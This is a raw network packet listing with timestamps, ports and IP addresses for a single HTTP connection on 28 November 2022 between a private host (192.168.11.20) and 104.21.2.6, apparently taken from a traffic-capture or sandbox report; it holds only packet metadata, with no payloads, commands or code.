Nov 28, 2022 16:37:03.965439081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965451956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965464115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965490103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965514898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965527058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965537071 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965543985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965568066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965579987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965590000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965600967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965611935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965622902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965634108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965645075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965656042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965666056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965689898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965702057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965707064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965707064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965707064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965722084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965734005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965744972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965755939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965780020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965795040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965954065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965954065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965972900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965986967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965997934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.966010094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.966021061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.966029882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.966257095 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968000889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968122959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968148947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968178034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968189001 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968195915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968208075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968219042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968230963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968241930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968252897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968264103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968275070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968286991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968297958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968318939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968343019 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968353033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.968359947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968359947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968359947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968528986 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.968882084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969006062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969019890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969031096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969050884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969075918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969090939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.969125032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969136953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969137907 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.969151974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969176054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969187021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969198942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969209909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969221115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969232082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969242096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969252110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.969341040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.969508886 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.969508886 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.988452911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988575935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988591909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988617897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988630056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988641024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988651991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988662958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988673925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988677025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.988703966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988729000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988739967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988749981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988760948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988771915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988782883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.988881111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.988881111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989018917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989063025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989075899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989087105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989098072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989108086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989119053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989130020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989140034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989151001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989160061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989170074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989181042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989187002 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989213943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989227057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989238024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989249945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989260912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989285946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989296913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989306927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989317894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989329100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989340067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989350080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989360094 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989360094 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989370108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989381075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989391088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989402056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989412069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989423037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989433050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989444017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989454031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989464998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989475012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989484072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989526987 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989536047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.989613056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.989777088 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.016882896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.016988039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017002106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017014980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017025948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017036915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017047882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017052889 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017082930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017095089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017106056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017117977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017142057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017152071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017163038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017174006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017184973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017211914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017222881 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017229080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017240047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017251015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017261028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017271996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017282963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017297029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017307997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017426014 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017426014 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017501116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017513990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017525911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017537117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017546892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017558098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017563105 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017587900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017601013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017611980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017623901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017636061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017647028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017745972 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.017781973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017793894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017805099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017817020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017841101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017853022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017863035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017874002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017884970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017894983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.017903090 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.018023014 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.018059015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018198013 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.018309116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018321037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018332005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018342018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.018347979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018358946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018369913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018379927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018390894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018400908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018409967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.018675089 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.038454056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038691998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.038723946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038737059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038749933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038760900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038772106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038803101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038826942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038837910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038849115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038858891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038870096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038882017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038892031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038902998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038917065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038928032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038938999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038949966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038959026 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.038965940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038976908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038988113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.038997889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039009094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039019108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039027929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039038897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039154053 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039154053 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039189100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039216042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039227009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039237976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039247990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039258957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039269924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039279938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039290905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039299011 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039308071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039318085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039329052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039339066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039367914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039380074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039391994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039402962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039427042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039438009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039448977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039458990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039469004 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039474010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039484978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039495945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039505005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039688110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039688110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.039736032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039750099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039761066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039772034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.039804935 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.040015936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040034056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.040034056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.040051937 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040062904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040074110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040085077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040095091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040106058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040117025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040128946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040139914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040149927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040162086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040170908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.040291071 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.040339947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.045578957 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.048374891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048576117 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.048691034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048705101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048719883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048731089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048742056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048752069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048763037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048774004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048784971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048795938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048806906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048818111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048829079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048839092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048850060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048861027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048871994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048878908 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.048891068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048902035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048913002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048923969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048927069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.048939943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048950911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048962116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048970938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.048981905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049098015 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049127102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049139977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049150944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049161911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049171925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049184084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049194098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049205065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049216032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049226999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049237967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049247980 CET	80	49830	104.21.2.6	192.168.11.20
